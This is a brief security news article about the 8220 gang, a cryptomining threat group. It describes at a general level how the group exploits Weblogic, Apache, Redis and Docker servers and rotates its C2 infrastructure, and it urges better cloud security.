One of China’s most notorious cybercriminal groups, the 8220 gang, has been improving its attack capabilities to execute sophisticated cryptocurrency mining attacks. This Chinese-speaking threat group is famous for utilising tactics, techniques, and procedures (TTPs) borrowed from other cybercriminal groups such as TeamTNT, WatchDog, and Rocke.
One of the well-known tactics this group adopted is using compromised Docker images and abusing Struts2, Weblogic, and Redis servers. However, some researchers spotted the group exploiting cloud app and Linux flaws to spread their botnet and cryptomining campaigns.
The 8220 gang has constantly been scouring the internet for flawed apps.
According to investigations, the 8220 gang continues to search for vulnerable internet apps and has changed its execution methods.
A sample of the group’s recent attack is leveraging vulnerable Oracle Weblogic servers. Additionally, the group has also exploited a flawed Apache web server recently.
8220 gang has upgraded its C2 IP addresses by consistently changing its server. This detail contradicts the group’s previous campaign, where they always reuse their command-and-control infrastructure.
Researchers also noticed that the threat group used the onacroner script, which the Rocke cryptomining actors have previously utilised.
Public cloud environments have been in constant battle with these malicious threat groups. Recently, a security research group warned about this landscape regarding the increased activity of the 8220 Gang.
The advisory explained that low-skilled threat groups like 8220 Gang could still cause a massive impact if their targeted entity has poor cybersecurity hygiene. Furthermore, the 8220 operators’ primary goal is to infect poorly configured cloud servers with a custom-built crypto miner and a botnet.
This cybercriminal group could expose targeted systems to additional security risks after infection. Hence, these operators could install more malware strains using the same intrusion technique.
The 8220 Gang has continuously upgraded its tactics, techniques, and procedures to obfuscate its actors and bypass security detections. Organisations should invest more in improving their cloud environments’ security to thwart campaigns such as DDoS and cryptomining.
